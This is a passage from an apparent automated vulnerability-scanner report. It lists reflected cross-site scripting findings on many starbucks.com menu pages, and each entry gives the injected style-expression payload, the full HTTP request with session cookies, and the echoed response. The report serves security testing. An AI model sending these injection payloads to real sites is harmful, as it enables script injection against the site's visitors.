HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:28:26 GMT Connection: close Content-Length: 43432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha?7efd8"style="x:expression(alert(1))"53305b3ac5e=1"/> ...[SNIP]...
1.745. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/pumpkin-spice-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f2e"style%3d"x%3aexpression(alert(1))"93a50fd3873 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4f2e"style="x:expression(alert(1))"93a50fd3873 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/pumpkin-spice-latte?b4f2e"style%3d"x%3aexpression(alert(1))"93a50fd3873=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:28:49 GMT Connection: close Content-Length: 43720
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte?b4f2e"style="x:expression(alert(1))"93a50fd3873=1"/> ...[SNIP]...
1.746. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/skinny-caramel-macchiato
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5878"style%3d"x%3aexpression(alert(1))"e44d0e07167 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5878"style="x:expression(alert(1))"e44d0e07167 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/skinny-caramel-macchiato?d5878"style%3d"x%3aexpression(alert(1))"e44d0e07167=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:24:05 GMT Connection: close Content-Length: 43234
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato?d5878"style="x:expression(alert(1))"e44d0e07167=1"/> ...[SNIP]...
1.747. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/skinny-cinnamon-dolce-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c121"style%3d"x%3aexpression(alert(1))"3bc6692e203 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c121"style="x:expression(alert(1))"3bc6692e203 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/skinny-cinnamon-dolce-latte?8c121"style%3d"x%3aexpression(alert(1))"3bc6692e203=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:29:18 GMT Connection: close Content-Length: 43735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte?8c121"style="x:expression(alert(1))"3bc6692e203=1"/> ...[SNIP]...
1.748. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/skinny-flavored-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1f1f"style%3d"x%3aexpression(alert(1))"645f16f209c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1f1f"style="x:expression(alert(1))"645f16f209c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/skinny-flavored-latte?c1f1f"style%3d"x%3aexpression(alert(1))"645f16f209c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:29:04 GMT Connection: close Content-Length: 43440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte?c1f1f"style="x:expression(alert(1))"645f16f209c=1"/> ...[SNIP]...
1.749. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/toffee-mocha
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec4e2"style%3d"x%3aexpression(alert(1))"d6a9d7dfee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec4e2"style="x:expression(alert(1))"d6a9d7dfee8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/toffee-mocha?ec4e2"style%3d"x%3aexpression(alert(1))"d6a9d7dfee8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:29:13 GMT Connection: close Content-Length: 42936
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/toffee-mocha?ec4e2"style="x:expression(alert(1))"d6a9d7dfee8=1"/> ...[SNIP]...
1.750. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/white-chocolate-mocha
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b4a"style%3d"x%3aexpression(alert(1))"ce231ac2d92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91b4a"style="x:expression(alert(1))"ce231ac2d92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/white-chocolate-mocha?91b4a"style%3d"x%3aexpression(alert(1))"ce231ac2d92=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:29:03 GMT Connection: close Content-Length: 43180
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha?91b4a"style="x:expression(alert(1))"ce231ac2d92=1"/> ...[SNIP]...
1.751. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/frappuccino-blended-beverages
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccae7"style%3d"x%3aexpression(alert(1))"533387bf426 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ccae7"style="x:expression(alert(1))"533387bf426 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages?ccae7"style%3d"x%3aexpression(alert(1))"533387bf426=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:23:00 GMT Connection: close Content-Length: 52502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?ccae7"style="x:expression(alert(1))"533387bf426=1"/> ...[SNIP]...
1.752. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eff8"style%3d"x%3aexpression(alert(1))"8e1c5ef3e74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3eff8"style="x:expression(alert(1))"8e1c5ef3e74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee?3eff8"style%3d"x%3aexpression(alert(1))"8e1c5ef3e74=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:32:00 GMT Connection: close Content-Length: 45428
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee?3eff8"style="x:expression(alert(1))"8e1c5ef3e74=1"/> ...[SNIP]...
1.753. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfdb4"style%3d"x%3aexpression(alert(1))"f631b1836 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfdb4"style="x:expression(alert(1))"f631b1836 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee?bfdb4"style%3d"x%3aexpression(alert(1))"f631b1836=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:32:06 GMT Connection: close Content-Length: 44981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee?bfdb4"style="x:expression(alert(1))"f631b1836=1"/> ...[SNIP]...
1.754. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dba1"style%3d"x%3aexpression(alert(1))"e2d7ccafcf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3dba1"style="x:expression(alert(1))"e2d7ccafcf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage?3dba1"style%3d"x%3aexpression(alert(1))"e2d7ccafcf6=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:32:12 GMT Connection: close Content-Length: 43470
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage?3dba1"style="x:expression(alert(1))"e2d7ccafcf6=1"/> ...[SNIP]...
1.755. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86623"style%3d"x%3aexpression(alert(1))"10adab1fa11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 86623"style="x:expression(alert(1))"10adab1fa11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee?86623"style%3d"x%3aexpression(alert(1))"10adab1fa11=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:32:15 GMT Connection: close Content-Length: 45260
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee?86623"style="x:expression(alert(1))"10adab1fa11=1"/> ...[SNIP]...
1.756. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce1b8"style%3d"x%3aexpression(alert(1))"2d1316ff148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce1b8"style="x:expression(alert(1))"2d1316ff148 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee?ce1b8"style%3d"x%3aexpression(alert(1))"2d1316ff148=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:32:05 GMT Connection: close Content-Length: 43245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee?ce1b8"style="x:expression(alert(1))"2d1316ff148=1"/> ...[SNIP]...
1.757. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dfa"style%3d"x%3aexpression(alert(1))"3f1516979fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30dfa"style="x:expression(alert(1))"3f1516979fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme?30dfa"style%3d"x%3aexpression(alert(1))"3f1516979fe=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:36:32 GMT Connection: close Content-Length: 45231
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme?30dfa"style="x:expression(alert(1))"3f1516979fe=1"/> ...[SNIP]...
1.758. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6196e"style%3d"x%3aexpression(alert(1))"b0d39f9484b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6196e"style="x:expression(alert(1))"b0d39f9484b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee?6196e"style%3d"x%3aexpression(alert(1))"b0d39f9484b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:32:50 GMT Connection: close Content-Length: 45459
